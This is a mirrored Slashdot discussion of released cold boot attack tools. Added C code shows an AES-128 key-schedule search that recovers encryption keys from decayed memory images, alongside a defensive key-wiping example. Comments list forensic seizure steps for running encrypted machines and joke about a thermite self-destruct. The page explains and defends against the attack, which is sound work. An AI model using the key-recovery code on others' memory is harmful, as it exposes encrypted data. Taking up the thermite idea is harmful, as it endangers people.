Slashdot Mirror


Cold Boot Attack Utilities Released At HOPE Conference

An anonymous reader writes "Jacob Appelbaum, one of the security researchers who worked on the cold boot attacks to recover encryption keys from memory even after reboot, has announced the release of the complete source code for the utilities at The Last HOPE in New York City. The hope (obligatory pun) is that the release of these tools will help to improve awareness of this attack vector and enable the development of countermeasures and mitigation techniques in both software and hardware. The full research paper (PDF) is also available."
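To make the attack vector concrete, here is an added example of the core key-recovery step, written for this page and not taken from the released utilities or the paper's code: a memory image is scanned for an AES-128 key by expanding every 16-byte window as if it were a key and checking whether the round keys that would follow it are actually present in the image, within some number of flipped bits. This is a simplified version of the key-schedule search the paper describes (it assumes the 16 key bytes themselves survived and tolerates a flat bit-error budget over the derived round keys); the image, the planted key and the "decay" are all constructed inline for the demo.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SCHED_LEN 176   /* AES-128: 11 round keys x 16 bytes */

/* Multiply in GF(2^8) with the AES polynomial; used for the S-box and rcon. */
static uint8_t gf_mul(uint8_t a, uint8_t b) {
    uint8_t p = 0;
    while (b) {
        if (b & 1) p ^= a;
        a = (uint8_t)((a << 1) ^ ((a & 0x80) ? 0x1b : 0));
        b >>= 1;
    }
    return p;
}

static uint8_t sbox[256];
static int sbox_ready;

/* Build the AES S-box (inverse in GF(2^8), then the affine map) instead of pasting the table. */
static void ensure_sbox(void) {
    if (sbox_ready) return;
    for (int x = 0; x < 256; x++) {
        uint8_t inv = 0;
        for (int y = 1; x && y < 256; y++)
            if (gf_mul((uint8_t)x, (uint8_t)y) == 1) { inv = (uint8_t)y; break; }
        uint8_t s = inv, r = inv;
        for (int i = 0; i < 4; i++) { r = (uint8_t)((r << 1) | (r >> 7)); s ^= r; }
        sbox[x] = (uint8_t)(s ^ 0x63);
    }
    sbox_ready = 1;
}

/* FIPS-197 key expansion for a 128-bit key: each round key is derived from the previous one,
 * which is exactly the redundancy the scan below exploits. */
void aes128_expand(const uint8_t key[16], uint8_t sched[SCHED_LEN]) {
    ensure_sbox();
    memcpy(sched, key, 16);
    uint8_t rcon = 1;
    for (int i = 16; i < SCHED_LEN; i += 4) {
        uint8_t t[4];
        memcpy(t, sched + i - 4, 4);
        if (i % 16 == 0) {   /* RotWord, SubWord, Rcon on the first word of every round key */
            uint8_t t0 = t[0];
            t[0] = sbox[t[1]] ^ rcon; t[1] = sbox[t[2]]; t[2] = sbox[t[3]]; t[3] = sbox[t0];
            rcon = gf_mul(rcon, 2);
        }
        for (int j = 0; j < 4; j++) sched[i + j] = sched[i - 16 + j] ^ t[j];
    }
}

static int hamming(const uint8_t *a, const uint8_t *b, size_t n) {
    int d = 0;
    for (size_t i = 0; i < n; i++)
        for (uint8_t x = a[i] ^ b[i]; x; x >>= 1) d += x & 1;
    return d;
}

/* Slide a 16-byte window over the image, expand it as a key, and compare the 160 bytes a real
 * schedule would put after it with what the image holds.  Up to max_bit_errors differing bits
 * are tolerated (decayed cells).  Returns the offset of the first hit, or -1. */
long find_aes128_key(const uint8_t *img, size_t len, int max_bit_errors, uint8_t key_out[16]) {
    uint8_t sched[SCHED_LEN];
    for (size_t off = 0; off + SCHED_LEN <= len; off++) {
        aes128_expand(img + off, sched);
        if (hamming(sched + 16, img + off + 16, SCHED_LEN - 16) <= max_bit_errors) {
            memcpy(key_out, img + off, 16);
            return (long)off;
        }
    }
    return -1;
}

/* Constructed demo image (not a real dump): pseudo-random filler, one genuine schedule planted
 * at DEMO_AT, then `flips` single-bit errors in the schedule body to stand in for decay. */
static const uint8_t DEMO_KEY[16] = {0x2b,0x7e,0x15,0x16,0x28,0xae,0xd2,0xa6,
                                     0xab,0xf7,0x15,0x88,0x09,0xcf,0x4f,0x3c};   /* FIPS-197 App. A key */
#define DEMO_LEN 4096
#define DEMO_AT  1000

long run_demo(int flips, int max_bit_errors) {
    static uint8_t img[DEMO_LEN];
    uint32_t x = 0x12345678u;
    for (size_t i = 0; i < DEMO_LEN; i++) { x = x * 1664525u + 1013904223u; img[i] = (uint8_t)(x >> 24); }
    aes128_expand(DEMO_KEY, img + DEMO_AT);
    for (int i = 0; i < flips && i < 20; i++) img[DEMO_AT + 16 + i * 7] ^= 0x01;
    uint8_t key[16];
    long off = find_aes128_key(img, DEMO_LEN, max_bit_errors, key);
    if (off >= 0 && memcmp(key, DEMO_KEY, 16) != 0) return -2;   /* hit with the wrong key: not expected */
    return off;
}

/* Sanity check against the FIPS-197 Appendix A expansion (round 1 starts a0 fa, round 10 d0 14 .. a6). */
int fips197_vector_ok(void) {
    uint8_t s[SCHED_LEN];
    aes128_expand(DEMO_KEY, s);
    return s[16] == 0xa0 && s[17] == 0xfa && s[160] == 0xd0 && s[161] == 0x14 && s[175] == 0xa6;
}

int main(void) {
    printf("FIPS-197 vector: %s\n", fips197_vector_ok() ? "ok" : "FAIL");
    printf("5 decayed bits, tolerance 8: schedule found at offset %ld\n", run_demo(5, 8));
    printf("5 decayed bits, tolerance 0: offset %ld (exact match fails)\n", run_demo(5, 0));
    return 0;
}
```

The point a defender should take from this is why wiping or hiding only the 16 raw key bytes is not enough: a software AES implementation usually keeps the full expanded schedule in RAM, and that structure is what makes the key findable even with errors in the image.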

20 of 113 comments

  1. RE: Editor/Submitter by Ihmhi · · Score: 4, Funny

    I think the editor and submitter both need to read this.

  2. Yup by Anonymous Coward · · Score: 2, Interesting

    I was there in the room when they released this attack. It was really an interesting idea of taking the memory out before decay happens and putting it into another box to read stuff off of it. Of course, physical security of a machine will solve this problem, but it is a very interesting attack.

    1. Re:Yup by DAldredge · · Score: 2, Funny

      Because changing the laws of physics is hard.

  3. There are some ways to minimize the problem by Psionicist · · Score: 5, Interesting

    The way I see this, you should simply not store keys in memory (that is, have your encrypted file system mounted) when you do not need access to the files. A correct program will overwrite the keys when the file system is dismounted.

    The purpose of full disk encryption (or system encryption in TrueCrypt) is, in my opinion, not meant as a "one password to protect everything". It's just an extra measure to secure temporary files, the swap file and other tracks the OS and applications may spread around. You should still encrypt your really secret files separately, and use basic precautions such as secure file erasure when you've used them.

    That said, I still don't think this attack is so important. If you have the file system mounted, and an attacker gains access to your computer, the files are already there!

    1. Re:There are some ways to minimize the problem by Anonymous Coward · · Score: 3, Interesting

      The whole point of this is unclean shutdown. How is your computer going to overwrite the keys in memory when someone pulls the plug?

      Sometimes the mere presence of a file, encrypted or not, is "incriminating" enough. Ask Kevin Mitnick about NSA.TXT on a floppy he had - it was a listing of a host with the registered users at the National Computer Security Archive, and that got quickly spun to "having compromised the security of the NSA".

      Sometimes you want to hide the existence of information, not just the information.

  4. because the fix would have to be in-hardware by Animaether · · Score: 5, Informative

    and not just the machine hardware, but rather the RAM stick itself.

    Essentially the exploit relies on data that is in RAM to still exist, even if it's just for a few seconds, if you take it out of the machine.

    You could add a 'write random crap to RAM' thing to your shutdown procedure, but that won't help if they simply power the machine off.
    The machine hardware could write random crap to RAM when it is powered down, but that won't help if they simply yank the RAM stick out while the machine is still running.

    So the RAM stick itself would have to detect that it is no longer connected to any motherboard and, using a charge kept in a capacitor, for example, flash itself with random crap.. or whatever.

    Keep in mind that this 'exploit' is quite difficult to execute, requiring not just physical access to the machine - but to the RAM. While the machine is running (or was running within the last N seconds, at least). In the vast majority of environments, that's going to be extremely difficult.. unless you own (or operate) that machine and you have no particular way of being caught.

    1. Re:because the fix would have to be in-hardware by Minwee · · Score: 4, Insightful

      Most server class machines have intrusion detection sensors which will trigger an alarm when the case is opened. They're hardly foolproof, but if you were concerned about this sort of attack then responding appropriately to a "Your Door Is Ajar" event would be a reasonable place to start.

    2. Re:because the fix would have to be in-hardware by jeiler · · Score: 2, Insightful

      You could add a 'write random crap to RAM' thing to your shutdown procedure, but that won't help if they simply power the machine off.

      Actually, one thing that might help would be a "Decrypt then wipe RAM" scheme, where the program decrypts a file, moves the file contents into some form of buffer, then wipes the RAM location where the decryption key was stored (and if necessary, wipe the paging file). It would leave that specific file exposed, but that's a heck of a lot better than leaving the key in RAM.

      --

      If you haven't been down-modded lately, you aren't trying.

      Sacred cows make the best hamburger.
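The "overwrite the keys on dismount" point in Psionicist's comment and jeiler's "decrypt then wipe" scheme both come down to the same discipline: keep key material only for as long as it is in use, keep it out of swap, and scrub it in a way the compiler cannot optimize away. Here is an added example of that discipline, written for this page and not code from the thread, from TrueCrypt, or from the released utilities. The cipher is a constructed XOR stand-in, the key and plaintext are made up, and `mlock` is assumed to be available (POSIX; failure is tolerated). As the Anonymous Coward reply notes, none of this helps if the plug is pulled while the key is live; it only narrows the window.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>
#include <sys/mman.h>   /* mlock/munlock, assumed POSIX */

/* Overwrite through a volatile pointer so the stores cannot be dropped as dead: a plain
 * memset() immediately before free() or return is routinely optimized away. */
void secure_zero(void *p, size_t n) {
    volatile uint8_t *v = (volatile uint8_t *)p;
    while (n--) *v++ = 0;
}

int is_all_zero(const uint8_t *p, size_t n) {
    uint8_t acc = 0;
    for (size_t i = 0; i < n; i++) acc |= p[i];
    return acc == 0;
}

/* A key slot: locked so it is not paged to the swap file, scrubbed on destroy. */
typedef struct { uint8_t key[32]; int locked; } key_slot;

void key_slot_load(key_slot *s, const uint8_t material[32]) {
    s->locked = (mlock(s->key, sizeof s->key) == 0);   /* may fail without privileges; wipe still happens */
    memcpy(s->key, material, sizeof s->key);
}

void key_slot_destroy(key_slot *s) {
    secure_zero(s->key, sizeof s->key);
    if (s->locked) munlock(s->key, sizeof s->key);
    s->locked = 0;
}

/* Constructed stand-in for the file cipher: XOR with a key-dependent stream.  Not a real cipher;
 * it is symmetric, so the same call encrypts and decrypts. */
static void toy_cipher(const uint8_t key[32], const uint8_t *in, uint8_t *out, size_t n) {
    for (size_t i = 0; i < n; i++) out[i] = in[i] ^ key[i % 32] ^ (uint8_t)(i * 0x9d);
}

/* Decrypt-then-wipe: the key exists only for the duration of the decryption.  Returns 1 when the
 * slot reads back as zeros afterwards.  What stays exposed is the plaintext in pt, which is the
 * trade jeiler describes: one file's contents rather than the key to all of them. */
int decrypt_then_wipe(const uint8_t master[32], const uint8_t *ct, uint8_t *pt, size_t n) {
    key_slot s;
    key_slot_load(&s, master);
    toy_cipher(s.key, ct, pt, n);
    key_slot_destroy(&s);
    return is_all_zero(s.key, sizeof s.key);
}

/* Constructed demo key; in a real program this is the passphrase-derived key and gets the same treatment. */
static const uint8_t DEMO_MASTER[32] = {
    0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88,0x99,0xaa,0xbb,0xcc,0xdd,0xee,0xff,
    0x10,0x32,0x54,0x76,0x98,0xba,0xdc,0xfe,0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef };

/* Round trip: encrypt a made-up file, decrypt it through the wipe path, and report 1 only if the
 * plaintext came back intact AND the key slot was scrubbed. */
int demo(void) {
    static const char msg[] = "payroll.xls: confidential";
    uint8_t ct[sizeof msg], pt[sizeof msg];
    toy_cipher(DEMO_MASTER, (const uint8_t *)msg, ct, sizeof msg);
    int key_gone = decrypt_then_wipe(DEMO_MASTER, ct, pt, sizeof msg);
    return key_gone && memcmp(pt, msg, sizeof msg) == 0;
}

int main(void) {
    printf("decrypt-then-wipe: %s\n", demo() ? "plaintext recovered, key slot zeroed" : "FAIL");
    return 0;
}
```

The same pattern applies to an encrypted-volume driver at dismount time: the wipe must cover the expanded key schedule and any copies the cipher code made, not just the 16 or 32 raw key bytes, and it must run before the memory is returned to the allocator.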

    3. Re:because the fix would have to be in-hardware by Eternauta3k · · Score: 2, Insightful

      Unless they pot it, or stick it somewhere inaccessible. Of course, someone determined enough will find a workaround (I mean CIA, not random hacker)

      --
      Yeah. Would you choose a neurosurgeon who pokes around people's brains in his spare time? I wouldn't.

    4. Re:because the fix would have to be in-hardware by the_olo · · Score: 2, Informative

      But then you'd have to input your passphrase each time you open a bloody file. Well, if there are only a few very important files, it's acceptable.

    5. Re:because the fix would have to be in-hardware by jeiler · · Score: 2

      Security versus convenience. If you have no files (or relatively few files) that require this level of security, use a more convenient method.

      --

      If you haven't been down-modded lately, you aren't trying.

      Sacred cows make the best hamburger.

  5. Re:Memory wiper? by jonbryce · · Score: 5, Informative

    You cool the chips down in the running computer with a spray duster, pull them out, and put them in a computer that you control.

    No software solution can be used to stop you from doing this; it has to be a hardware-based solution.

  6. Re:Tamper proof case, anyone? by Sir_Lewk · · Score: 2, Interesting

    You can hardhack your way around any hardhack.

    --
    "linux is just DOS with a UNIX like syntax" -- Galactic Dominator (944134)

  7. Capturing machines with full disk encryption by Animats · · Score: 5, Interesting

    Here's the existing approach to this problem.

    1. Send in SWAT team. Stop user from turning off computer.
    2. Bring in HotPlug kit and UPS.
    3. Plug "Mouse Jiggler" into USB port to keep no-activity timeout from causing logout.
    4. Turn on UPS.
    5. Plug HotPlug unit into UPS.
    6. Plug HotPlug unit output plug (a male plug which is a power output) into power strip, or, if necessary, remove wall outlet plate and connect clamp-on connectors to hot wires.
    7. Unplug power strip from line power. HotPlug unit will switch in power from UPS.
    8. Plug power strip into UPS. HotPlug unit will recognize this and deenergize its output plug.
    9. Unplug HotPlug output plug and input plug. Computer is now running entirely on UPS.
    10. Carry computer and UPS to forensics lab before UPS battery runs down.
    11. Plug in UPS to keep battery charged.
    12. Access disk as desired.

    1. Re:Capturing machines with full disk encryption by Chris+Burkhardt · · Score: 3, Funny

      13. Try not to get hit by truck as you maneuver Frogger machine across street.

      --
      "And there be unix which have made themselves unix for the kingdom of heaven's sake." - Matt. 19:12

    2. Re:Capturing machines with full disk encryption by Eternauta3k · · Score: 3, Funny

      Looks like a forced login every 10 minutes is a good idea for people working with really sensitive data.

      108 minutes is more like it

      --
      Yeah. Would you choose a neurosurgeon who pokes around people's brains in his spare time? I wouldn't.

  8. Re:Tamper proof case, anyone? by kesuki · · Score: 3, Insightful

    Thermite packed around the RAM seems the best way to go. Then if they tamper with the case, it triggers a 'tamper switch', the thermite goes off, and boom, just a molten blob of goo. Also, if you're going to have a self destruct on the RAM, you may as well do the HDD as well, and you might as well throw in a manual switch along with the 'tamper switch' in case the FBI comes knocking, and have a good plan for how to circumvent your 'tamper switch'.

    Thermite is a bit extreme, but if you want your data irretrievably destroyed, there is nothing like thermite.

  9. Re:Tamper proof case, anyone? by rwillard · · Score: 2, Interesting

    While it's true that you can bypass any hardhack security system, surprise can be a great asset. Most people, even Law Enforcement, aren't going to expect your computer to fry itself if opened, or whatever system you use. It's the kind of trick that will only work a few times, but a few times is probably enough.

    A lot of the new 'cool' law enforcement devices are USB, for easy access and easy reading of the computer. Imagine a computer that has three in-use USB ports and one open slot, and plugging a device into the open slot (or plugging a new device in by removing an existing one without disabling the security feature) would cause the computer to fry itself.

    Is it foolproof? No, but it'd be a start.

  10. Re:Memory wiper? by freddy_dreddy · · Score: 2, Interesting

    You can store the keys in video memory, you can't pull those out of a laptop. And yes, it's not only possible but also rather easy. Storing them in the lower part (first 64kb ?) which is used to display the "boot screen" will actually create an automatic sweep. Both backdoors locked.

    --
    "Violence is the last refuge of the competent, and, generally, the first refuge of the incompetent" - Thing_1

  11. A candidate for the Darwin Awards by Anonymous Coward · · Score: 2, Funny

    So, do you use this thermite enabled system on your LAPtop?